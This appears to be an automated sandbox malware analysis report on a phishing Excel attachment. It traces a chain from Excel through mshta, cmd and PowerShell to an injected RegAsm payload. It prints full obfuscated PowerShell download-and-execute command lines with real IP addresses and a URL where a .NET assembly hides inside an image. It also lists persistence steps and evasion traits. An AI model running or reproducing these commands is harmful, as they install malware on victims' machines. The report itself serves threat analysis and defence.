                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.pdb source: powershell.exe, 00000007.00000002.490691993.0000000002730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.pdbhP0 source: powershell.exe, 00000007.00000002.490691993.0000000002730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: B3930000.0.dr Initial sample: OLE indicators vbamacros = False
                Source: RFQ_0230909024SEPT.xla.xlsx Initial sample: OLE indicators encrypted = True

                Data Obfuscation

                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudElGIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))"Jump to behavior
                Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudElGIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? 
? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RECSRN/002/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.cmdline"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,17_2_0041CBE1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_000007FE898B022D push eax; iretd 7_2_000007FE898B0241
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_000007FE898B00BD pushad ; iretd 7_2_000007FE898B00C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_000007FE8988022D push eax; iretd 14_2_000007FE89880241
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_000007FE8988223D push eax; ret 14_2_000007FE89882271
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_000007FE898800BD pushad ; iretd 14_2_000007FE898800C1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00457186 push ecx; ret 17_2_00457199
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_0045E55D push esi; ret 17_2_0045E566
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00457AA8 push eax; ret 17_2_00457AC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00434EB6 push ecx; ret 17_2_00434EC9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_10002806 push ecx; ret 17_2_10002819
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_0044693D push ecx; ret 21_2_0044694D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_0044DB70 push eax; ret 21_2_0044DB84
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_0044DB70 push eax; ret 21_2_0044DBAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_00451D54 push eax; ret 21_2_00451D61
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 23_2_0044B090 push eax; ret 23_2_0044B0A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 23_2_0044B090 push eax; ret 23_2_0044B0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 23_2_00451D34 push eax; ret 23_2_00451D41
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 23_2_00444E71 push ecx; ret 23_2_00444E81
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 26_2_00414060 push eax; ret 26_2_00414074
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 26_2_00414060 push eax; ret 26_2_0041409C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 26_2_00414039 push ecx; ret 26_2_00414049
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 26_2_004164EB push 0000006Ah; retf 26_2_004165C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 26_2_00416553 push 0000006Ah; retf 26_2_004165C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 26_2_00416555 push 0000006Ah; retf 26_2_004165C4

                Persistence and Installation Behavior

                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00406EEB ShellExecuteW,URLDownloadToFileW,17_2_00406EEB
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,17_2_0041AADB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,17_2_0041CBE1
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
                Source: RFQ_0230909024SEPT.xla.xlsx Stream path 'Workbook' entropy: 7.99564397201 (max. 8.0)
                Source: B3930000.0.dr Stream path 'Workbook' entropy: 7.99577900888 (max. 8.0)

                Malware Analysis System Evasion

                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_0040F7E2 Sleep,ExitProcess, 17_2_0040F7E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 21_2_0040DD85
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 17_2_0041A7D9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000
                Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1919
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8039
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 895
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1612
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1240
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4479
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_17-53714
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.dll
                Source: C:\Windows\System32\mshta.exe TID: 3524 Thread sleep time: -480000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3652 Thread sleep count: 1919 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3652 Thread sleep count: 8039 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3700 Thread sleep time: -120000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3704 Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3936 Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3920 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3968 Thread sleep count: 1240 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3956 Thread sleep count: 4479 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4012 Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4016 Thread sleep time: -6456360425798339s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4016 Thread sleep time: -3600000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4016 Thread sleep time: -600000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4076 Thread sleep time: -42000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2148 Thread sleep time: -120000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2864 Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Last function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 17_2_0040928E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 17_2_0041C322
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 17_2_0040C388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 17_2_004096A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 17_2_00408847
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00407877 FindFirstFileW,FindNextFileW, 17_2_00407877
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_0044E8F9 FindFirstFileExA, 17_2_0044E8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 17_2_0040BB6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW, 17_2_00419B86
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 17_2_0040BD72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 17_2_100010F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_10006580 FindFirstFileExA, 17_2_10006580
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_0040AE51 FindFirstFileW,FindNextFileW, 21_2_0040AE51
